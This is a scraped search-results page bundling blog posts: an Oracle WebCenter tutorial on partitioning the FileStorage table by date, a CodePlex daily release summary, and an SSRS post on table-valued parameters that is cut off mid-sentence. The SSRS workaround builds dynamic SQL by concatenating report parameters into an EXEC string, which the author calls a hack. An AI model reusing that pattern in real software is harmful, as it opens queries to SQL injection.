Search Results

Search found 27946 results on 1118 pages for 'output buffer empty'.

Page 1079/1118 | < Previous Page | 1075 1076 1077 1078 1079 1080 1081 1082 1083 1084 1085 1086  | Next Page >

  • Partitioned Repository for WebCenter Content using Oracle Database 11g

    - by Adao Junior
    One of the biggest challenges for content management solutions is related to the storage management due the high volumes of the unstoppable growing of information. Even if you have storage appliances and a lot of terabytes, thinks like backup, compression, deduplication, storage relocation, encryption, availability could be a nightmare. One standard option that you have with the Oracle WebCenter Content is to store data to the database. And the Oracle Database allows you leverage features like compression, deduplication, encryption and seamless backup. But with a huge volume, the challenge is passed to the DBA to keep the WebCenter Content Database up and running. One solution is the use of DB partitions for your content repository, but what are the implications of this? Can I fit this with my business requirements? Well, yes. It’s up to you how you will manage that, you just need a good plan. During you “storage brainstorm plan” take in your mind what you need, such as storage petabytes of documents? You need everything on-line? There’s a way to logically separate the “good content” from the “legacy content”? The first thing that comes to my mind is to use the creation date of the document, but you need to remember that this document could receive a lot of revisions and maybe you can consider the revision creation date. Your plan can have also complex rules like per Document Type or per a custom metadata like department or an hybrid per date, per DocType and an specific virtual folder. Extrapolation the use, you can have your repository distributed in different servers, different disks, different disk types (Such as ssds, sas, sata, tape,…), separated accordingly your business requirements, separating the “hot” content from the legacy and easily matching your compliance requirements. If you think to use by revision, the simple way is to consider the dId, that is the sequential unique id for every content created using the WebCenter Content or the dLastModified that is the date field of the FileStorage table that contains the date of inclusion of the content to the DB Table using SecureFiles. Using the scenario of partitioned repository using an hierarchical separation by date, we will transform the FileStorage table in an partitioned table using  “Partition by Range” of the dLastModified column (You can use the dId or a join with other tables for other metadata such as dDocType, Security, etc…). The test scenario bellow covers: Previous existent data on the JDBC Storage to be migrated to the new partitioned JDBC Storage Partition by Date Automatically generation of new partitions based on a pre-defined interval (Available only with Oracle Database 11g+) Deduplication and Compression for legacy data Oracle WebCenter Content 11g PS5 (Could present some customizations that do not affect the test scenario) For the test case you need some data stored using JDBC Storage to be the “legacy” data. If you do not have done before, just create an Storage rule pointed to the JDBC Storage: Enable the metadata StorageRule in the UI and upload some documents using this rule. For this test case you can run using the schema owner or an dba user. We will use the schema owner TESTS_OCS. I can’t forgot to tell that this is just a test and you should do a proper backup of your environment. When you use the schema owner, you need some privileges, using the dba user grant the privileges needed: REM Grant privileges required for online redefinition. GRANT EXECUTE ON DBMS_REDEFINITION TO TESTS_OCS; GRANT ALTER ANY TABLE TO TESTS_OCS; GRANT DROP ANY TABLE TO TESTS_OCS; GRANT LOCK ANY TABLE TO TESTS_OCS; GRANT CREATE ANY TABLE TO TESTS_OCS; GRANT SELECT ANY TABLE TO TESTS_OCS; REM Privileges required to perform cloning of dependent objects. GRANT CREATE ANY TRIGGER TO TESTS_OCS; GRANT CREATE ANY INDEX TO TESTS_OCS; In our test scenario we will separate the content as Legacy, Day1, Day2, Day3 and Future. This last one will partitioned automatically using 3 tablespaces in a round robin mode. In a real scenario the partition rule could be per month, per year or any rule that you choose. Table spaces for the test scenario: CREATE TABLESPACE TESTS_OCS_PART_LEGACY DATAFILE 'tests_ocs_part_legacy.dat' SIZE 500K AUTOEXTEND ON NEXT 500K MAXSIZE UNLIMITED; CREATE TABLESPACE TESTS_OCS_PART_DAY1 DATAFILE 'tests_ocs_part_day1.dat' SIZE 500K AUTOEXTEND ON NEXT 500K MAXSIZE UNLIMITED; CREATE TABLESPACE TESTS_OCS_PART_DAY2 DATAFILE 'tests_ocs_part_day2.dat' SIZE 500K AUTOEXTEND ON NEXT 500K MAXSIZE UNLIMITED; CREATE TABLESPACE TESTS_OCS_PART_DAY3 DATAFILE 'tests_ocs_part_day3.dat' SIZE 500K AUTOEXTEND ON NEXT 500K MAXSIZE UNLIMITED; CREATE TABLESPACE TESTS_OCS_PART_ROUND_ROBIN_A 'tests_ocs_part_round_robin_a.dat' DATAFILE SIZE 500K AUTOEXTEND ON NEXT 500K MAXSIZE UNLIMITED; CREATE TABLESPACE TESTS_OCS_PART_ROUND_ROBIN_B 'tests_ocs_part_round_robin_b.dat' DATAFILE SIZE 500K AUTOEXTEND ON NEXT 500K MAXSIZE UNLIMITED; CREATE TABLESPACE TESTS_OCS_PART_ROUND_ROBIN_C 'tests_ocs_part_round_robin_c.dat' DATAFILE SIZE 500K AUTOEXTEND ON NEXT 500K MAXSIZE UNLIMITED; Before start, gather optimizer statistics on the actual FileStorage table: EXEC DBMS_STATS.GATHER_TABLE_STATS(USER, 'FileStorage', cascade => TRUE); Now check if is possible execute the redefinition process: EXEC DBMS_REDEFINITION.CAN_REDEF_TABLE('TESTS_OCS', 'FileStorage',DBMS_REDEFINITION.CONS_USE_PK); If no errors messages, you are good to go. Create a Partitioned Interim FileStorage table. You need to create a new table with the partition information to act as an interim table: CREATE TABLE FILESTORAGE_Part ( DID NUMBER(*,0) NOT NULL ENABLE, DRENDITIONID VARCHAR2(30 CHAR) NOT NULL ENABLE, DLASTMODIFIED TIMESTAMP (6), DFILESIZE NUMBER(*,0), DISDELETED VARCHAR2(1 CHAR), BFILEDATA BLOB ) LOB (BFILEDATA) STORE AS SECUREFILE ( ENABLE STORAGE IN ROW NOCACHE LOGGING KEEP_DUPLICATES NOCOMPRESS ) PARTITION BY RANGE (DLASTMODIFIED) INTERVAL (NUMTODSINTERVAL(1,'DAY')) STORE IN (TESTS_OCS_PART_ROUND_ROBIN_A, TESTS_OCS_PART_ROUND_ROBIN_B, TESTS_OCS_PART_ROUND_ROBIN_C) ( PARTITION FILESTORAGE_PART_LEGACY VALUES LESS THAN (TO_DATE('05-APR-2012 12.00.00 AM', 'DD-MON-YYYY HH.MI.SS AM')) TABLESPACE TESTS_OCS_PART_LEGACY LOB (BFILEDATA) STORE AS SECUREFILE ( TABLESPACE TESTS_OCS_PART_LEGACY RETENTION NONE DEDUPLICATE COMPRESS HIGH ), PARTITION FILESTORAGE_PART_DAY1 VALUES LESS THAN (TO_DATE('06-APR-2012 07.25.00 PM', 'DD-MON-YYYY HH.MI.SS AM')) TABLESPACE TESTS_OCS_PART_DAY1 LOB (BFILEDATA) STORE AS SECUREFILE ( TABLESPACE TESTS_OCS_PART_DAY1 RETENTION AUTO KEEP_DUPLICATES COMPRESS ), PARTITION FILESTORAGE_PART_DAY2 VALUES LESS THAN (TO_DATE('06-APR-2012 07.55.00 PM', 'DD-MON-YYYY HH.MI.SS AM')) TABLESPACE TESTS_OCS_PART_DAY2 LOB (BFILEDATA) STORE AS SECUREFILE ( TABLESPACE TESTS_OCS_PART_DAY2 RETENTION AUTO KEEP_DUPLICATES NOCOMPRESS ), PARTITION FILESTORAGE_PART_DAY3 VALUES LESS THAN (TO_DATE('06-APR-2012 07.58.00 PM', 'DD-MON-YYYY HH.MI.SS AM')) TABLESPACE TESTS_OCS_PART_DAY3 LOB (BFILEDATA) STORE AS SECUREFILE ( TABLESPACE TESTS_OCS_PART_DAY3 RETENTION AUTO KEEP_DUPLICATES NOCOMPRESS ) ); After the creation you should see your partitions defined. Note that only the fixed range partitions have been created, none of the interval partition have been created. Start the redefinition process: BEGIN DBMS_REDEFINITION.START_REDEF_TABLE( uname => 'TESTS_OCS' ,orig_table => 'FileStorage' ,int_table => 'FileStorage_PART' ,col_mapping => NULL ,options_flag => DBMS_REDEFINITION.CONS_USE_PK ); END; This operation can take some time to complete, depending how many contents that you have and on the size of the table. Using the DBA user you can check the progress with this command: SELECT * FROM v$sesstat WHERE sid = 1; Copy dependent objects: DECLARE redefinition_errors PLS_INTEGER := 0; BEGIN DBMS_REDEFINITION.COPY_TABLE_DEPENDENTS( uname => 'TESTS_OCS' ,orig_table => 'FileStorage' ,int_table => 'FileStorage_PART' ,copy_indexes => DBMS_REDEFINITION.CONS_ORIG_PARAMS ,copy_triggers => TRUE ,copy_constraints => TRUE ,copy_privileges => TRUE ,ignore_errors => TRUE ,num_errors => redefinition_errors ,copy_statistics => FALSE ,copy_mvlog => FALSE ); IF (redefinition_errors > 0) THEN DBMS_OUTPUT.PUT_LINE('>>> FileStorage to FileStorage_PART temp copy Errors: ' || TO_CHAR(redefinition_errors)); END IF; END; With the DBA user, verify that there's no errors: SELECT object_name, base_table_name, ddl_txt FROM DBA_REDEFINITION_ERRORS; *Note that will show 2 lines related to the constrains, this is expected. Synchronize the interim table FileStorage_PART: BEGIN DBMS_REDEFINITION.SYNC_INTERIM_TABLE( uname => 'TESTS_OCS', orig_table => 'FileStorage', int_table => 'FileStorage_PART'); END; Gather statistics on the new table: EXEC DBMS_STATS.GATHER_TABLE_STATS(USER, 'FileStorage_PART', cascade => TRUE); Complete the redefinition: BEGIN DBMS_REDEFINITION.FINISH_REDEF_TABLE( uname => 'TESTS_OCS', orig_table => 'FileStorage', int_table => 'FileStorage_PART'); END; During the execution the FileStorage table is locked in exclusive mode until finish the operation. After the last command the FileStorage table is partitioned. If you have contents out of the range partition, you should see the new partitions created automatically, not generating an error if you “forgot” to create all the future ranges. You will see something like: You now can drop the FileStorage_PART table: border-bottom-width: 1px; border-bottom-style: solid; text-align: left; border-left-color: silver; border-left-width: 1px; border-left-style: solid; padding-bottom: 4px; line-height: 12pt; background-color: #f4f4f4; margin-top: 20px; margin-right: 0px; margin-bottom: 10px; margin-left: 0px; padding-left: 4px; width: 97.5%; padding-right: 4px; font-family: 'Courier New', Courier, monospace; direction: ltr; max-height: 200px; font-size: 8pt; overflow-x: auto; overflow-y: auto; border-top-color: silver; border-top-width: 1px; border-top-style: solid; cursor: text; border-right-color: silver; border-right-width: 1px; border-right-style: solid; padding-top: 4px; " id="codeSnippetWrapper"> DROP TABLE FileStorage_PART PURGE; To check the FileStorage table is valid and is partitioned, use the command: SELECT num_rows,partitioned FROM user_tables WHERE table_name = 'FILESTORAGE'; You can list the contents of the FileStorage table in a specific partition, per example: SELECT * FROM FileStorage PARTITION (FILESTORAGE_PART_LEGACY) Some useful commands that you can use to check the partitions, note that you need to run using a DBA user: SELECT * FROM DBA_TAB_PARTITIONS WHERE table_name = 'FILESTORAGE';   SELECT * FROM DBA_TABLESPACES WHERE tablespace_name like 'TESTS_OCS%'; After the redefinition process complete you have a new FileStorage table storing all content that has the Storage rule pointed to the JDBC Storage and partitioned using the rule set during the creation of the temporary interim FileStorage_PART table. At this point you can test the WebCenter Content downloading the documents (Original and Renditions). Note that the content could be already in the cache area, take a look in the weblayout directory to see if a file with the same id is there, then click on the web rendition of your test file and see if have created the file and you can open, this means that is all working. The redefinition process can be repeated many times, this allow you test what the better layout, over and over again. Now some interesting maintenance actions related to the partitions: Make an tablespace read only. No issues viewing, the WebCenter Content do not alter the revisions When try to delete an content that is part of an read only tablespace, an error will occurs and the document will not be deleted The only way to prevent errors today is creating an custom component that checks the partitions and if you have an document in an “Read Only” repository, execute the deletion process of the metadata and mark the document to be deleted on the next db maintenance, like a new redefinition. Take an tablespace off-line for archiving purposes or any other reason. When you try open an document that is included in this tablespace will receive an error that was unable to retrieve the content, but the others online tablespaces are not affected. Same behavior when deleting documents. Again, an custom component is the solution. If you have an document “out of range”, the component can show an message that the repository for that document is offline. This can be extended to a option to the user to request to put online again. Moving some legacy content to an offline repository (table) using the Exchange option to move the content from one partition to a empty nonpartitioned table like FileStorage_LEGACY. Note that this option will remove the registers from the FileStorage and will not be able to open the stored content. You always need to keep in mind the indexes and constrains. An redefinition separating the original content (vault) from the renditions and separate by date ate the same time. This could be an option for DAM environments that want to have an special place for the renditions and put the original files in a storage with less performance. The process will be the same, you just need to change the script of the interim table to use composite partitioning. Will be something like: CREATE TABLE FILESTORAGE_RenditionPart ( DID NUMBER(*,0) NOT NULL ENABLE, DRENDITIONID VARCHAR2(30 CHAR) NOT NULL ENABLE, DLASTMODIFIED TIMESTAMP (6), DFILESIZE NUMBER(*,0), DISDELETED VARCHAR2(1 CHAR), BFILEDATA BLOB ) LOB (BFILEDATA) STORE AS SECUREFILE ( ENABLE STORAGE IN ROW NOCACHE LOGGING KEEP_DUPLICATES NOCOMPRESS ) PARTITION BY LIST (DRENDITIONID) SUBPARTITION BY RANGE (DLASTMODIFIED) ( PARTITION Vault VALUES ('primaryFile') ( SUBPARTITION FILESTORAGE_VAULT_LEGACY VALUES LESS THAN (TO_DATE('05-APR-2012 12.00.00 AM', 'DD-MON-YYYY HH.MI.SS AM')) LOB (BFILEDATA) STORE AS SECUREFILE , SUBPARTITION FILESTORAGE_VAULT_DAY1 VALUES LESS THAN (TO_DATE('06-APR-2012 07.25.00 PM', 'DD-MON-YYYY HH.MI.SS AM')) LOB (BFILEDATA) STORE AS SECUREFILE , SUBPARTITION FILESTORAGE_VAULT_DAY2 VALUES LESS THAN (TO_DATE('06-APR-2012 07.55.00 PM', 'DD-MON-YYYY HH.MI.SS AM')) LOB (BFILEDATA) STORE AS SECUREFILE , SUBPARTITION FILESTORAGE_VAULT_DAY3 VALUES LESS THAN (TO_DATE('06-APR-2012 07.58.00 PM', 'DD-MON-YYYY HH.MI.SS AM')) LOB (BFILEDATA) STORE AS SECUREFILE , SUBPARTITION FILESTORAGE_VAULT_FUTURE VALUES LESS THAN (MAXVALUE) ) ,PARTITION WebLayout VALUES ('webViewableFile') ( SUBPARTITION FILESTORAGE_WEBLAYOUT_LEGACY VALUES LESS THAN (TO_DATE('05-APR-2012 12.00.00 AM', 'DD-MON-YYYY HH.MI.SS AM')) LOB (BFILEDATA) STORE AS SECUREFILE , SUBPARTITION FILESTORAGE_WEBLAYOUT_DAY1 VALUES LESS THAN (TO_DATE('06-APR-2012 07.25.00 PM', 'DD-MON-YYYY HH.MI.SS AM')) LOB (BFILEDATA) STORE AS SECUREFILE , SUBPARTITION FILESTORAGE_WEBLAYOUT_DAY2 VALUES LESS THAN (TO_DATE('06-APR-2012 07.55.00 PM', 'DD-MON-YYYY HH.MI.SS AM')) LOB (BFILEDATA) STORE AS SECUREFILE , SUBPARTITION FILESTORAGE_WEBLAYOUT_DAY3 VALUES LESS THAN (TO_DATE('06-APR-2012 07.58.00 PM', 'DD-MON-YYYY HH.MI.SS AM')) LOB (BFILEDATA) STORE AS SECUREFILE , SUBPARTITION FILESTORAGE_WEBLAYOUT_FUTURE VALUES LESS THAN (MAXVALUE) ) ,PARTITION Special VALUES ('Special') ( SUBPARTITION FILESTORAGE_SPECIAL_LEGACY VALUES LESS THAN (TO_DATE('05-APR-2012 12.00.00 AM', 'DD-MON-YYYY HH.MI.SS AM')) LOB (BFILEDATA) STORE AS SECUREFILE , SUBPARTITION FILESTORAGE_SPECIAL_DAY1 VALUES LESS THAN (TO_DATE('06-APR-2012 07.25.00 PM', 'DD-MON-YYYY HH.MI.SS AM')) LOB (BFILEDATA) STORE AS SECUREFILE , SUBPARTITION FILESTORAGE_SPECIAL_DAY2 VALUES LESS THAN (TO_DATE('06-APR-2012 07.55.00 PM', 'DD-MON-YYYY HH.MI.SS AM')) LOB (BFILEDATA) STORE AS SECUREFILE , SUBPARTITION FILESTORAGE_SPECIAL_DAY3 VALUES LESS THAN (TO_DATE('06-APR-2012 07.58.00 PM', 'DD-MON-YYYY HH.MI.SS AM')) LOB (BFILEDATA) STORE AS SECUREFILE , SUBPARTITION FILESTORAGE_SPECIAL_FUTURE VALUES LESS THAN (MAXVALUE) ) )ENABLE ROW MOVEMENT; The next post related to partitioned repository will come with an sample component to handle the possible exceptions when you need to take off line an tablespace/partition or move to another place. Also, we can include some integration to the Retention Management and Records Management. Another subject related to partitioning is the ability to create an FileStore Provider pointed to a different database, raising the level of the distributed storage vs. performance. Let us know if this is important to you or you have an use case not listed, leave a comment. Cross-posted on the blog.ContentrA.com

    Read the article

  • CodePlex Daily Summary for Saturday, April 07, 2012

    CodePlex Daily Summary for Saturday, April 07, 2012Popular ReleasesHarness - Internet Explorer Automation: Harness 2.0.3: support the operation fo frameset, frame and iframe Add commands SwitchFrame GetUrl GoBack GoForward Refresh SetTimeout GetTimeout Rename commands GetActiveWindow to GetActiveBrowser SetActiveWindow to SetActiveBrowser FindWindowAll to FindBrowser NewWindow to NewBrowser GetMajorVersion to GetVersionBetter Explorer: Better Explorer 2.0.0.861 Alpha: - fixed new folder button operation not work well in some situations - removed some unnecessary code like subclassing that is not needed anymore - Added option to make Better Exlorer default (at least for WIN+E operations) - Added option to enable file operation replacements (like Terracopy) to work with Better Explorer - Added some basic usability to "Share" button - Other fixesLightFarsiDictionary - ??????? ??? ?????/???????: LightFarsiDictionary - v1: LightFarsiDictionary - v1WPF Application Framework (WAF): WPF Application Framework (WAF) 2.5.0.3: Version: 2.5.0.3 (Milestone 3): This release contains the source code of the WPF Application Framework (WAF) and the sample applications. Requirements .NET Framework 4.0 (The package contains a solution file for Visual Studio 2010) The unit test projects require Visual Studio 2010 Professional Changelog Legend: [B] Breaking change; [O] Marked member as obsolete [O] WAF: Mark the StringBuilderExtensions class as obsolete because the AppendInNewLine method can be replaced with string.Jo...RiP-Ripper & PG-Ripper: RiP-Ripper 2.9.30: changes NEW: Added Support for "DirectUpload.net" links NEW: Added Support for "PixRoute.com" links NEW: Added Support for "ImagePicasa.com" links FIXED: "PixHub.eu" linksCommunity TFS Build Extensions: April 2012: Release notes to follow...ClosedXML - The easy way to OpenXML: ClosedXML 0.65.2: Aside from many bug fixes we now have Conditional Formatting The conditional formatting was sponsored by http://www.bewing.nl (big thanks) New on v0.65.1 Fixed issue when loading conditional formatting with default values for icon sets New on v0.65.2 Fixed issue loading conditional formatting Improved inserts performanceLiberty: v3.2.0.0 Release 4th April 2012: Change Log-Added -Halo 3 support (invincibility, ammo editing) -Halo 3: ODST support (invincibility, ammo editing) -The file transfer page now shows its progress in the Windows 7 taskbar -"About this build" settings page -Reach Change what an object is carrying -Reach Change which node a carried object is attached to -Reach Object node viewer and exporter -Reach Change which weapons you are carrying from the object editor -Reach Edit the weapon controller of vehicles and turrets -An error dia...MSBuild Extension Pack: April 2012: Release Blog Post The MSBuild Extension Pack April 2012 release provides a collection of over 435 MSBuild tasks. A high level summary of what the tasks currently cover includes the following: System Items: Active Directory, Certificates, COM+, Console, Date and Time, Drives, Environment Variables, Event Logs, Files and Folders, FTP, GAC, Network, Performance Counters, Registry, Services, Sound Code: Assemblies, AsyncExec, CAB Files, Code Signing, DynamicExecute, File Detokenisation, GUID’...DotNetNuke® Community Edition CMS: 06.01.05: Major Highlights Fixed issue that stopped users from creating vocabularies when the portal ID was not zero Fixed issue that caused modules configured to be displayed on all pages to be added to the wrong container in new pages Fixed page quota restriction issue in the Ribbon Bar Removed restriction that would not allow users to use a dash in page names. Now users can create pages with names like "site-map" Fixed issue that was causing the wrong container to be loaded in modules wh...51Degrees.mobi - Mobile Device Detection and Redirection: 2.1.3.1: One Click Install from NuGet Changes to Version 2.1.3.11. [assembly: AllowPartiallyTrustedCallers] has been added back into the AssemblyInfo.cs file to prevent failures with other assemblies in Medium trust environments. 2. The Lite data embedded into the assembly has been updated to include devices from December 2011. The 42 new RingMark properties will return Unknown if RingMark data is not available. Changes to Version 2.1.2.11Code Changes 1. The project is now licenced under the Mozilla...MVC Controls Toolkit: Mvc Controls Toolkit 2.0.0: Added Support for Mvc4 beta and WebApi The SafeqQuery and HttpSafeQuery IQueryable implementations that works as wrappers aroung any IQueryable to protect it from unwished queries. "Client Side" pager specialized in paging javascript data coming either from a remote data source, or from local data. LinQ like fluent javascript api to build queries either against remote data sources, or against local javascript data, with exactly the same interface. There are 3 different query objects exp...ExtAspNet: ExtAspNet v3.1.2: ExtAspNet - ?? ExtJS ??? ASP.NET 2.0 ???,????? AJAX ?????????? ExtAspNet ????? ExtJS ??? ASP.NET 2.0 ???,????? AJAX ??????????。 ExtAspNet ??????? JavaScript,?? CSS,?? UpdatePanel,?? ViewState,?? WebServices ???????。 ??????: IE 7.0, Firefox 3.6, Chrome 3.0, Opera 10.5, Safari 3.0+ ????:Apache License 2.0 (Apache) ??:http://extasp.net/ ??:http://bbs.extasp.net/ ??:http://extaspnet.codeplex.com/ ??:http://sanshi.cnblogs.com/ ????: +2012-04-04 v3.1.2 -??IE?????????????BUG(??"about:blank"?...nopCommerce. Open source shopping cart (ASP.NET MVC): nopcommerce 2.50: Highlight features & improvements: • Significant performance optimization. • Allow store owners to create several shipments per order. Added a new shipping status: “Partially shipped”. • Pre-order support added. Enables your customers to place a Pre-Order and pay for the item in advance. Displays “Pre-order” button instead of “Buy Now” on the appropriate pages. Makes it possible for customer to buy available goods and Pre-Order items during one session. It can be managed on a product variant ...WiX Toolset: WiX v3.6 RC0: WiX v3.6 RC0 (3.6.2803.0) provides support for VS11 and a more stable Burn engine. For more information see Rob's blog post about the release: http://robmensching.com/blog/posts/2012/4/3/WiX-v3.6-Release-Candidate-Zero-availableSageFrame: SageFrame 2.0: Sageframe is an open source ASP.NET web development framework developed using ASP.NET 3.5 with service pack 1 (sp1) technology. It is designed specifically to help developers build dynamic website by providing core functionality common to most web applications.iTuner - The iTunes Companion: iTuner 1.5.4475: Fix to parse empty playlists in iTunes LibraryDocument.Editor: 2012.2: Whats New for Document.Editor 2012.2: New Save Copy support New Page Setup support Minor Bug Fix's, improvements and speed upsVidCoder: 1.3.2: Added option for the minimum title length to scan. Added support to enable or disable LibDVDNav. Added option to prompt to delete source files after clearing successful completed items. Added option to disable remembering recent files and folders. Tweaked number box to only select all on a quick click.MJP's DirectX 11 Samples: Light Indexed Deferred Rendering: Implements light indexed deferred using per-tile light lists calculated in a compute shader, as well as a traditional deferred renderer that uses a compute shader for per-tile light culling and per-pixel shading.New ProjectsAdvertising Management: Ph?n m?m qu?n lý qu?ng cáoAgile Compact Database: It is database for all. AssemblyTransformer: AssemblyTransformer is a tool for modifying .NET assemblies using Mono Cecil. It handles the entire transformation process including strong name signing and offers a simple command-line interface and a basic framework for creating and configuring specific transformations.Cafe For You: Ph?n m?m gi?i thi?u và qu?n lý quán cafeClient-side Templated Script Control: Allows a developer to add a repeater-style templated list control to a web page that will be data bound client-side, and may respond to client events. The control may be data bound by a web service call on initialization, and may also have it's data source set via client code.CRM Project - Beginner Sample: Sample to help beginners to start in C# development. Ejemplo para ayudar a quienes inician con el desarrollo en C#.Deployment Made Easy: The goal of this project is to make deployments to windows servers easy using the web deployment toolEasyCMS: EasyCMSExcel to SQL Server Database Bulk Transfer: Quick and simple WPF tool to allow users export data from an Excel spreadsheet to a SQL Server database table. Provided as is. But if you need any help let me know. HTML Client demo for WCF RIA Services: Demo application with HTML client (upshot.js + knockout.js) on WCF RIA ServicesKOI: Kinect Open Interface: Kinect Open Interface, KOI, provides a way to detect and have the user confirm 11 gestures for your UI. Please read my blog for info: http://www.kinecthelp.com/2012/04/koi-kinect-open-interface.htmlLazyWinAdmin: LazyWinAdmin is a Powershell script to manage local or remote machine ressources.LCDSmartie dll to display Audio spectrum on Windows 7: An LCDSmartie plugin that displays anything being played as an audio spectrum.LiveHelpChatApp: With Live chat help you can provide online / Offline help to your client it has facebook style chat for online and offline users Download and EnjoyMailSender: Small tool for sending mail messages contains multiple attachements with sum size bigger than allowed size. You can drag'n'drop attachments and click send - application split all attachments to parts and sent it separately. There is not address book yet. Mauricio: Mauricio Lima PageMiddleware and Enterprise services foundation: Define a model of deployment and management for Middleware and enterprise applicationsMyFirstPro: This is a test projOld Games Launcher: Old Games Launcher is a combined DosBox frontend & a Direct Draw game/application starter.Pharmakos Studio: Pharmakos Studio is an extensible IDE. It was originally written specifically as an UnrealScript editor for the UDK, however it is being written so that any language can be supported via plugins.Proyecto Eclipse-Android: Proyectos con Eclipse-AdroidProyectos II: Proyecto para Farmaciapullsource: pull source directsource filterQuizzer: Awesome program for quizzes and tests.Solution Settings for Visual Studio: Solution Settings for Visual Studio allows a file containing settings such as formatting, fonts and colors to be included with a project. When the solution is opened, these settings are automatically applied, and when it is closed, the changes are reverted.sundance: test test testWebcomic Reader: A little Idea for an on-, and offline usable, touch-friendly Windows 7 Webcomic Reader.WinRT PathTextBlock: WinRT PathTextBlock is a control that overcomes some of the limitations in the built in WinRT TextBlock, such as not being able to outline the text, and not being able to distort the text, for example to draw it along a circle. Previously, you could use a tool like Expression Design to create the text and export it as a Path, but this wouldn't work for text that needed to be specified at run time. This control allows you to specify the Text property and it will generate the proper Path obj...Yaplex open source projects: Yaplex open source projects????API SDK-VB6(oauth2): ????API SDK-VB6(oauth2)????????API SDK VB6: ??????????API SDK vb?

    Read the article

  • Using Table-Valued Parameters With SQL Server Reporting Services

    - by Jesse
    In my last post I talked about using table-valued parameters to pass a list of integer values to a stored procedure without resorting to using comma-delimited strings and parsing out each value into a TABLE variable. In this post I’ll extend the “Customer Transaction Summary” report example to see how we might leverage this same stored procedure from within an SQL Server Reporting Services (SSRS) report. I’ve worked with SSRS off and on for the past several years and have generally found it to be a very useful tool for building nice-looking reports for end users quickly and easily. That said, I’ve been frustrated by SSRS from time to time when seemingly simple things are difficult to accomplish or simply not supported at all. I thought that using table-valued parameters from within a SSRS report would be simple, but unfortunately I was wrong. Customer Transaction Summary Example Let’s take the “Customer Transaction Summary” report example from the last post and try to plug that same stored procedure into an SSRS report. Our report will have three parameters: Start Date – beginning of the date range for which the report will summarize customer transactions End Date – end of the date range for which the report will summarize customer transactions Customer Ids – One or more customer Ids representing the customers that will be included in the report The simplest way to get started with this report will be to create a new dataset and point it at our Customer Transaction Summary report stored procedure (note that I’m using SSRS 2012 in the screenshots below, but there should be little to no difference with SSRS 2008): When you initially create this dataset the SSRS designer will try to invoke the stored procedure to determine what the parameters and output fields are for you automatically. As part of this process the following dialog pops-up: Obviously I can’t use this dialog to specify a value for the ‘@customerIds’ parameter since it is of the IntegerListTableType user-defined type that we created in the last post. Unfortunately this really throws the SSRS designer for a loop, and regardless of what combination of Data Type, Pass Null Value, or Parameter Value I used here, I kept getting this error dialog with the message, "Operand type clash: nvarchar is incompatible with IntegerListTableType". This error message makes some sense considering that the nvarchar type is indeed incompatible with the IntegerListTableType, but there’s little clue given as to how to remedy the situation. I don’t know for sure, but I think that behind-the-scenes the SSRS designer is trying to give the @customerIds parameter an nvarchar-typed SqlParameter which is causing the issue. When I first saw this error I figured that this might just be a limitation of the dataset designer and that I’d be able to work around the issue by manually defining the parameters. I know that there are some special steps that need to be taken when invoking a stored procedure with a table-valued parameter from ADO .NET, so I figured that I might be able to use some custom code embedded in the report  to create a SqlParameter instance with the needed properties and value to make this work, but the “Operand type clash" error message persisted. The Text Query Approach Just because we’re using a stored procedure to create the dataset for this report doesn’t mean that we can’t use the ‘Text’ Query Type option and construct an EXEC statement that will invoke the stored procedure. In order for this to work properly the EXEC statement will also need to declare and populate an IntegerListTableType variable to pass into the stored procedure. Before I go any further I want to make one point clear: this is a really ugly hack and it makes me cringe to do it. Simply put, I strongly feel that it should not be this difficult to use a table-valued parameter with SSRS. With that said, let’s take a look at what we’ll have to do to make this work. Manually Define Parameters First, we’ll need to manually define the parameters for report by right-clicking on the ‘Parameters’ folder in the ‘Report Data’ window. We’ll need to define the ‘@startDate’ and ‘@endDate’ as simple date parameters. We’ll also create a parameter called ‘@customerIds’ that will be a mutli-valued Integer parameter: In the ‘Available Values’ tab we’ll point this parameter at a simple dataset that just returns the CustomerId and CustomerName of each row in the Customers table of the database or manually define a handful of Customer Id values to make available when the report runs. Once we have these parameters properly defined we can take another crack at creating the dataset that will invoke the ‘rpt_CustomerTransactionSummary’ stored procedure. This time we’ll choose the ‘Text’ query type option and put the following into the ‘Query’ text area: 1: exec('declare @customerIdList IntegerListTableType ' + @customerIdInserts + 2: ' EXEC rpt_CustomerTransactionSummary 3: @startDate=''' + @startDate + ''', 4: @endDate='''+ @endDate + ''', 5: @customerIds=@customerIdList')   By using the ‘Text’ query type we can enter any arbitrary SQL that we we want to and then use parameters and string concatenation to inject pieces of that query at run time. It can be a bit tricky to parse this out at first glance, but from the SSRS designer’s point of view this query defines three parameters: @customerIdInserts – This will be a Text parameter that we use to define INSERT statements that will populate the @customerIdList variable that is being declared in the SQL. This parameter won’t actually ever get passed into the stored procedure. I’ll go into how this will work in a bit. @startDate – This is a simple date parameter that will get passed through directly into the @startDate parameter of the stored procedure on line 3. @endDate – This is another simple data parameter that will get passed through into the @endDate parameter of the stored procedure on line 4. At this point the dataset designer will be able to correctly parse the query and should even be able to detect the fields that the stored procedure will return without needing to specify any values for query when prompted to. Once the dataset has been correctly defined we’ll have a @customerIdInserts parameter listed in the ‘Parameters’ tab of the dataset designer. We need to define an expression for this parameter that will take the values selected by the user for the ‘@customerIds’ parameter that we defined earlier and convert them into INSERT statements that will populate the @customerIdList variable that we defined in our Text query. In order to do this we’ll need to add some custom code to our report using the ‘Report Properties’ dialog: Any custom code defined in the Report Properties dialog gets embedded into the .rdl of the report itself and (unfortunately) must be written in VB .NET. Note that you can also add references to custom .NET assemblies (which could be written in any language), but that’s outside the scope of this post so we’ll stick with the “quick and dirty” VB .NET approach for now. Here’s the VB .NET code (note that any embedded code that you add here must be defined in a static/shared function, though you can define as many functions as you want): 1: Public Shared Function BuildIntegerListInserts(ByVal variableName As String, ByVal paramValues As Object()) As String 2: Dim insertStatements As New System.Text.StringBuilder() 3: For Each paramValue As Object In paramValues 4: insertStatements.AppendLine(String.Format("INSERT {0} VALUES ({1})", variableName, paramValue)) 5: Next 6: Return insertStatements.ToString() 7: End Function   This method takes a variable name and an array of objects. We use an array of objects here because that is how SSRS will pass us the values that were selected by the user at run-time. The method uses a StringBuilder to construct INSERT statements that will insert each value from the object array into the provided variable name. Once this method has been defined in the custom code for the report we can go back into the dataset designer’s Parameters tab and update the expression for the ‘@customerIdInserts’ parameter by clicking on the button with the “function” symbol that appears to the right of the parameter value. We’ll set the expression to: 1: =Code.BuildIntegerListInserts("@customerIdList ", Parameters!customerIds.Value)   In order to invoke our custom code method we simply need to invoke “Code.<method name>” and pass in any needed parameters. The first parameter needs to match the name of the IntegerListTableType variable that we used in the EXEC statement of our query. The second parameter will come from the Value property of the 